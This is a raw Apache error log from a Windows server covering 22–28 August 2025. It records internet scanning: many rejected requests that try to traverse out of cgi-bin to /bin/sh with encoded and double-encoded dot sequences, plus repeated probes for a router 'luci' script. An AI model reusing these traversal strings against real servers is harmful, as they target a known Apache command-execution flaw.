[Fri Aug 22 01:09:45.329883 2025] [core:error] [pid 5416:tid 668] [client 101.126.132.95:37086] AH10244: invalid URI path (/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh)
[Fri Aug 22 01:09:46.642456 2025] [core:error] [pid 5416:tid 1008] [client 101.126.132.95:37088] AH10244: invalid URI path (/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh)
[Fri Aug 22 10:55:19.942187 2025] [core:error] [pid 5416:tid 668] [client 120.46.0.136:47878] AH10244: invalid URI path (/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh)
[Fri Aug 22 10:55:20.535963 2025] [core:error] [pid 5416:tid 668] [client 120.46.0.136:48520] AH10244: invalid URI path (/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh)
[Fri Aug 22 11:47:08.372174 2025] [core:error] [pid 5416:tid 668] [client 45.131.108.170:52390] AH10244: invalid URI path (/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh)
[Fri Aug 22 11:47:10.403404 2025] [core:error] [pid 5416:tid 668] [client 45.131.108.170:52406] AH10244: invalid URI path (/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh)
[Sat Aug 23 00:13:00.760268 2025] [cgi:error] [pid 5416:tid 992] [client 66.240.192.138:43764] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Sat Aug 23 00:25:23.735967 2025] [cgi:error] [pid 5416:tid 992] [client 34.250.12.251:47330] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Sat Aug 23 04:09:35.562813 2025] [cgi:error] [pid 5416:tid 668] [client 167.94.145.106:47496] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://103.44.244.42:80/cgi-bin
[Sat Aug 23 05:32:53.841027 2025] [cgi:error] [pid 5416:tid 668] [client 176.65.148.163:35426] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/param.cgi, referer: http://103.44.244.42:80/
[Sat Aug 23 17:13:08.817515 2025] [core:error] [pid 5416:tid 1008] [client 197.220.93.117:50376] AH10244: invalid URI path (/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh)
[Sat Aug 23 17:13:10.801916 2025] [core:error] [pid 5416:tid 1008] [client 197.220.93.117:50382] AH10244: invalid URI path (/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh)
[Sun Aug 24 04:47:53.996022 2025] [cgi:error] [pid 5416:tid 668] [client 162.142.125.214:48608] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://103.44.244.42:80/cgi-bin
[Sun Aug 24 04:48:56.888071 2025] [cgi:error] [pid 5416:tid 668] [client 206.168.34.208:51382] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://103.44.244.42:80/cgi-bin
[Sun Aug 24 04:49:05.700757 2025] [core:error] [pid 5416:tid 1008] [client 197.220.93.100:37492] AH10244: invalid URI path (/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh)
[Sun Aug 24 04:49:06.857061 2025] [core:error] [pid 5416:tid 1008] [client 197.220.93.100:37508] AH10244: invalid URI path (/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh)
[Sun Aug 24 10:00:25.592419 2025] [cgi:error] [pid 5416:tid 668] [client 117.132.188.205:12829] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Sun Aug 24 10:38:37.220879 2025] [core:error] [pid 5416:tid 668] [client 42.114.171.240:45187] AH10244: invalid URI path (/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh)
[Sun Aug 24 10:38:37.814703 2025] [core:error] [pid 5416:tid 668] [client 42.114.171.240:10255] AH10244: invalid URI path (/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh)
[Sun Aug 24 17:15:27.332712 2025] [core:error] [pid 5416:tid 668] [client 173.212.238.133:50780] AH10244: invalid URI path (/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh)
[Sun Aug 24 17:15:28.098364 2025] [core:error] [pid 5416:tid 668] [client 173.212.238.133:50786] AH10244: invalid URI path (/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh)
[Mon Aug 25 03:39:36.510334 2025] [core:error] [pid 5416:tid 668] [client 45.14.245.67:48814] AH10244: invalid URI path (/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh)
[Mon Aug 25 05:23:48.196137 2025] [core:error] [pid 5416:tid 668] [client 45.144.29.201:55148] AH10244: invalid URI path (/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh)
[Mon Aug 25 05:46:26.460780 2025] [cgi:error] [pid 5416:tid 668] [client 206.168.34.68:35300] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://103.44.244.42:80/cgi-bin
[Mon Aug 25 05:46:58.023953 2025] [cgi:error] [pid 5416:tid 668] [client 206.168.34.89:45658] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://103.44.244.42:80/cgi-bin
[Mon Aug 25 07:55:16.687618 2025] [cgi:error] [pid 5416:tid 668] [client 206.168.34.65:46120] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://103.44.244.42:80/cgi-bin
[Mon Aug 25 16:41:59.739261 2025] [cgi:error] [pid 5416:tid 992] [client 142.93.149.37:33652] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Mon Aug 25 20:39:02.087792 2025] [core:error] [pid 5416:tid 992] [client 106.13.112.250:3840] AH10244: invalid URI path (/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh)
[Mon Aug 25 20:39:17.306864 2025] [core:error] [pid 5416:tid 992] [client 106.13.112.250:5828] AH10244: invalid URI path (/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh)
[Mon Aug 25 22:55:57.518558 2025] [core:error] [pid 5416:tid 992] [client 160.30.188.242:52400] AH10244: invalid URI path (/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh)
[Mon Aug 25 22:55:59.518618 2025] [core:error] [pid 5416:tid 668] [client 160.30.188.242:52412] AH10244: invalid URI path (/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh)
[Mon Aug 25 23:02:53.106031 2025] [core:error] [pid 5416:tid 668] [client 154.221.17.157:51056] AH10244: invalid URI path (/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh)
[Mon Aug 25 23:02:53.293472 2025] [core:error] [pid 5416:tid 668] [client 154.221.17.157:51652] AH10244: invalid URI path (/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh)
[Tue Aug 26 08:46:13.504398 2025] [cgi:error] [pid 5416:tid 668] [client 167.94.138.178:57898] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://103.44.244.42:80/cgi-bin
[Tue Aug 26 08:47:34.974886 2025] [cgi:error] [pid 5416:tid 668] [client 162.142.125.126:55706] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://103.44.244.42:80/cgi-bin
[Tue Aug 26 10:36:23.429702 2025] [cgi:error] [pid 5416:tid 668] [client 162.142.125.212:49202] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://103.44.244.42:80/cgi-bin
[Tue Aug 26 11:06:51.016860 2025] [core:error] [pid 5416:tid 668] [client 49.72.46.211:56164] AH10244: invalid URI path (/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh)
[Tue Aug 26 11:07:06.220337 2025] [core:error] [pid 5416:tid 668] [client 49.72.46.211:56500] AH10244: invalid URI path (/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh)
[Tue Aug 26 12:17:21.114027 2025] [cgi:error] [pid 5416:tid 668] [client 75.110.226.226:46800] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Tue Aug 26 12:49:55.398404 2025] [cgi:error] [pid 5416:tid 668] [client 199.45.154.149:36870] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://103.44.244.42:80/cgi-bin
[Tue Aug 26 14:06:23.199770 2025] [cgi:error] [pid 5416:tid 1080] [client 101.36.121.22:44236] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Tue Aug 26 14:54:41.066592 2025] [cgi:error] [pid 5416:tid 900] [client 59.17.94.186:39974] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Tue Aug 26 14:54:44.269830 2025] [cgi:error] [pid 5416:tid 900] [client 59.17.94.186:40034] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Tue Aug 26 15:07:35.256278 2025] [cgi:error] [pid 5416:tid 1036] [client 167.94.145.105:40670] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://103.44.244.42:80/cgi-bin
[Tue Aug 26 16:33:11.136515 2025] [cgi:error] [pid 5416:tid 900] [client 189.136.130.240:60507] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Tue Aug 26 16:33:16.714831 2025] [cgi:error] [pid 5416:tid 1036] [client 189.136.130.240:60459] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Tue Aug 26 19:29:17.901721 2025] [cgi:error] [pid 5416:tid 1036] [client 34.71.237.156:42722] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Tue Aug 26 20:29:20.247493 2025] [cgi:error] [pid 5416:tid 1036] [client 122.199.74.31:52086] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Tue Aug 26 20:29:20.372400 2025] [cgi:error] [pid 5416:tid 1036] [client 122.199.74.31:52116] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Tue Aug 26 20:35:52.006213 2025] [cgi:error] [pid 5416:tid 1036] [client 221.207.25.112:32812] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Tue Aug 26 21:09:39.894930 2025] [cgi:error] [pid 5416:tid 1036] [client 218.158.250.34:34549] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Tue Aug 26 21:09:41.019947 2025] [cgi:error] [pid 5416:tid 1036] [client 218.158.250.34:34586] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Tue Aug 26 21:09:42.082496 2025] [cgi:error] [pid 5416:tid 1036] [client 121.167.125.180:37642] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Tue Aug 26 21:09:45.207571 2025] [cgi:error] [pid 5416:tid 1036] [client 121.167.125.180:37712] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Tue Aug 26 21:10:27.083437 2025] [cgi:error] [pid 5416:tid 1036] [client 125.139.96.146:33123] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Tue Aug 26 21:10:27.208369 2025] [cgi:error] [pid 5416:tid 1036] [client 125.139.96.146:33155] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Tue Aug 26 22:08:08.210440 2025] [cgi:error] [pid 5416:tid 1036] [client 209.164.247.118:44862] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Tue Aug 26 22:27:36.189358 2025] [core:error] [pid 5416:tid 900] [client 82.66.241.245:37946] AH10244: invalid URI path (/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh)
[Tue Aug 26 22:27:40.017621 2025] [core:error] [pid 5416:tid 900] [client 82.66.241.245:49036] AH10244: invalid URI path (/cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh)
[Tue Aug 26 23:47:34.288266 2025] [cgi:error] [pid 5416:tid 900] [client 51.19.192.221:60574] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Wed Aug 27 00:21:49.708492 2025] [cgi:error] [pid 5416:tid 1036] [client 185.183.145.246:36147] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Wed Aug 27 00:21:50.052189 2025] [cgi:error] [pid 5416:tid 1036] [client 185.183.145.246:36397] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Wed Aug 27 01:20:44.896750 2025] [cgi:error] [pid 5416:tid 900] [client 91.169.235.135:7423] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Wed Aug 27 01:20:45.240605 2025] [cgi:error] [pid 5416:tid 900] [client 91.169.235.135:9670] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Wed Aug 27 01:34:05.318637 2025] [cgi:error] [pid 5416:tid 900] [client 176.79.17.225:58222] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Wed Aug 27 01:58:10.730244 2025] [cgi:error] [pid 5416:tid 900] [client 160.39.24.114:43754] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Wed Aug 27 01:58:11.074092 2025] [cgi:error] [pid 5416:tid 900] [client 160.39.24.114:43877] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Wed Aug 27 02:15:41.893500 2025] [cgi:error] [pid 5416:tid 900] [client 59.1.211.226:45270] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Wed Aug 27 02:15:42.018546 2025] [cgi:error] [pid 5416:tid 900] [client 59.1.211.226:45297] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Wed Aug 27 03:09:59.823992 2025] [cgi:error] [pid 5416:tid 900] [client 191.96.219.93:44304] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Wed Aug 27 03:10:00.292746 2025] [cgi:error] [pid 5416:tid 900] [client 191.96.219.93:44418] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Wed Aug 27 03:43:00.461634 2025] [cgi:error] [pid 5416:tid 900] [client 179.124.30.192:50801] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Wed Aug 27 03:43:00.977207 2025] [cgi:error] [pid 5416:tid 900] [client 179.124.30.192:50888] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Wed Aug 27 05:21:18.999273 2025] [cgi:error] [pid 5416:tid 900] [client 103.4.235.86:37960] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Wed Aug 27 06:04:11.602748 2025] [cgi:error] [pid 5416:tid 972] [client 45.224.251.44:52896] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Wed Aug 27 06:04:12.055824 2025] [cgi:error] [pid 5416:tid 972] [client 45.224.251.44:52975] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Wed Aug 27 06:43:57.109939 2025] [cgi:error] [pid 5416:tid 972] [client 2.44.116.217:42194] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Wed Aug 27 06:44:00.656977 2025] [cgi:error] [pid 5416:tid 972] [client 2.44.116.217:42632] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Wed Aug 27 07:21:18.410429 2025] [cgi:error] [pid 5416:tid 972] [client 181.119.111.71:53463] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Wed Aug 27 07:21:18.785448 2025] [cgi:error] [pid 5416:tid 972] [client 181.119.111.71:53554] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Wed Aug 27 08:48:26.649696 2025] [cgi:error] [pid 5416:tid 972] [client 68.113.110.78:48004] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Wed Aug 27 08:48:26.962186 2025] [cgi:error] [pid 5416:tid 972] [client 68.113.110.78:48122] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Wed Aug 27 09:05:53.360757 2025] [cgi:error] [pid 5416:tid 152] [client 209.164.236.20:55905] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Wed Aug 27 09:05:54.157676 2025] [cgi:error] [pid 5416:tid 152] [client 209.164.236.20:56051] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Wed Aug 27 09:32:04.166279 2025] [cgi:error] [pid 5416:tid 152] [client 88.175.75.20:13287] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Wed Aug 27 09:34:21.075540 2025] [cgi:error] [pid 5416:tid 152] [client 49.0.90.108:46958] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Wed Aug 27 09:34:22.122430 2025] [cgi:error] [pid 5416:tid 152] [client 49.0.90.108:46976] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Wed Aug 27 10:56:02.689026 2025] [cgi:error] [pid 5416:tid 1112] [client 85.195.251.40:2520] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Wed Aug 27 10:56:03.267163 2025] [cgi:error] [pid 5416:tid 1112] [client 85.195.251.40:2553] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Wed Aug 27 11:58:37.263291 2025] [cgi:error] [pid 5416:tid 1112] [client 206.220.191.144:53110] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Wed Aug 27 11:58:40.607120 2025] [cgi:error] [pid 5416:tid 1112] [client 206.220.191.144:53175] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Wed Aug 27 14:14:59.461870 2025] [cgi:error] [pid 5416:tid 1112] [client 34.79.212.94:60412] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/
[Wed Aug 27 14:23:57.552358 2025] [cgi:error] [pid 5416:tid 972] [client 218.158.250.34:47126] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Wed Aug 27 14:23:57.708627 2025] [cgi:error] [pid 5416:tid 972] [client 218.158.250.34:47444] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Wed Aug 27 15:30:07.389164 2025] [cgi:error] [pid 5416:tid 972] [client 118.141.248.118:40607] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Wed Aug 27 15:30:07.826764 2025] [cgi:error] [pid 5416:tid 972] [client 118.141.248.118:40716] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Wed Aug 27 15:45:50.925490 2025] [cgi:error] [pid 5416:tid 972] [client 167.94.138.176:34566] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://103.44.244.42:80/cgi-bin
[Wed Aug 27 15:47:37.912148 2025] [cgi:error] [pid 5416:tid 972] [client 167.94.138.194:60864] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://103.44.244.42:80/cgi-bin
[Wed Aug 27 15:57:22.955883 2025] [cgi:error] [pid 5416:tid 972] [client 170.82.23.165:33344] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Wed Aug 27 15:57:23.471570 2025] [cgi:error] [pid 5416:tid 972] [client 170.82.23.165:33380] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Wed Aug 27 16:08:00.126272 2025] [cgi:error] [pid 5416:tid 972] [client 58.40.8.206:46942] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Wed Aug 27 16:33:24.678079 2025] [cgi:error] [pid 5416:tid 972] [client 160.39.24.114:49199] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Wed Aug 27 20:26:43.488691 2025] [cgi:error] [pid 5416:tid 972] [client 68.113.110.78:46575] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Wed Aug 27 20:26:43.816789 2025] [cgi:error] [pid 5416:tid 972] [client 68.113.110.78:46696] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Wed Aug 27 21:29:16.307982 2025] [cgi:error] [pid 5416:tid 972] [client 193.82.243.39:52525] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Wed Aug 27 21:29:20.042510 2025] [cgi:error] [pid 5416:tid 972] [client 193.82.243.39:52640] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Wed Aug 27 21:34:20.158667 2025] [cgi:error] [pid 5416:tid 972] [client 185.169.4.184:50614] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Wed Aug 27 22:50:29.793308 2025] [cgi:error] [pid 5416:tid 972] [client 175.208.15.203:38726] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Wed Aug 27 22:50:29.902535 2025] [cgi:error] [pid 5416:tid 972] [client 175.208.15.203:39018] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Wed Aug 27 23:38:12.244733 2025] [cgi:error] [pid 5416:tid 972] [client 183.106.38.201:40077] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Wed Aug 27 23:38:12.386035 2025] [cgi:error] [pid 5416:tid 972] [client 183.106.38.201:40113] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Thu Aug 28 01:53:56.169377 2025] [cgi:error] [pid 5416:tid 972] [client 121.185.148.144:38302] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Thu Aug 28 02:07:15.219799 2025] [cgi:error] [pid 5416:tid 972] [client 103.130.82.30:56212] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Thu Aug 28 02:07:18.657388 2025] [cgi:error] [pid 5416:tid 972] [client 103.130.82.30:56353] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Thu Aug 28 02:35:05.960292 2025] [cgi:error] [pid 5416:tid 972] [client 210.106.139.172:58285] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Thu Aug 28 03:26:16.610982 2025] [cgi:error] [pid 5416:tid 972] [client 211.228.142.201:36943] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Thu Aug 28 03:26:16.767255 2025] [cgi:error] [pid 5416:tid 972] [client 211.228.142.201:36975] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Thu Aug 28 04:54:22.101776 2025] [cgi:error] [pid 5416:tid 972] [client 121.186.1.159:44283] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Thu Aug 28 06:04:26.230149 2025] [cgi:error] [pid 5416:tid 152] [client 177.69.131.214:57007] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Thu Aug 28 06:04:26.636390 2025] [cgi:error] [pid 5416:tid 152] [client 177.69.131.214:58114] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Thu Aug 28 09:28:52.955811 2025] [cgi:error] [pid 5416:tid 900] [client 220.124.188.145:54775] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Thu Aug 28 09:28:53.080879 2025] [cgi:error] [pid 5416:tid 900] [client 220.124.188.145:54821] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Thu Aug 28 11:36:32.959242 2025] [cgi:error] [pid 5416:tid 900] [client 211.228.142.81:33703] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Thu Aug 28 11:36:33.084202 2025] [cgi:error] [pid 5416:tid 900] [client 211.228.142.81:33732] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Thu Aug 28 11:42:07.137595 2025] [cgi:error] [pid 5416:tid 900] [client 121.152.52.167:60999] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Thu Aug 28 11:42:07.262658 2025] [cgi:error] [pid 5416:tid 900] [client 121.152.52.167:32808] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Thu Aug 28 15:01:35.403358 2025] [cgi:error] [pid 5416:tid 900] [client 14.33.215.88:50144] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Thu Aug 28 15:44:01.304590 2025] [cgi:error] [pid 5416:tid 1080] [client 12.147.183.155:36018] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Thu Aug 28 16:22:58.572864 2025] [cgi:error] [pid 5416:tid 1080] [client 58.40.8.206:35474] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Thu Aug 28 16:22:58.650989 2025] [cgi:error] [pid 5416:tid 900] [client 58.40.8.206:35560] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Thu Aug 28 16:46:08.154219 2025] [cgi:error] [pid 5416:tid 900] [client 206.168.34.126:51480] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://103.44.244.42:80/cgi-bin
[Thu Aug 28 16:47:53.234843 2025] [cgi:error] [pid 5416:tid 900] [client 206.168.34.84:48894] AH02812: attempt to invoke directory as script: C:/Apache24/cgi-bin/, referer: http://103.44.244.42:80/cgi-bin
[Thu Aug 28 17:51:49.185369 2025] [cgi:error] [pid 5416:tid 900] [client 118.43.117.160:33663] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Thu Aug 28 18:25:03.910588 2025] [cgi:error] [pid 5416:tid 900] [client 175.208.20.113:53614] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Thu Aug 28 18:55:02.708808 2025] [cgi:error] [pid 5416:tid 900] [client 79.26.45.234:39017] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Thu Aug 28 18:55:03.177523 2025] [cgi:error] [pid 5416:tid 900] [client 79.26.45.234:39176] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Thu Aug 28 20:20:32.593086 2025] [cgi:error] [pid 5416:tid 900] [client 125.139.58.46:34566] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
[Thu Aug 28 20:20:32.718137 2025] [cgi:error] [pid 5416:tid 900] [client 125.139.58.46:34603] AH02811: script not found or unable to stat: C:/Apache24/cgi-bin/luci
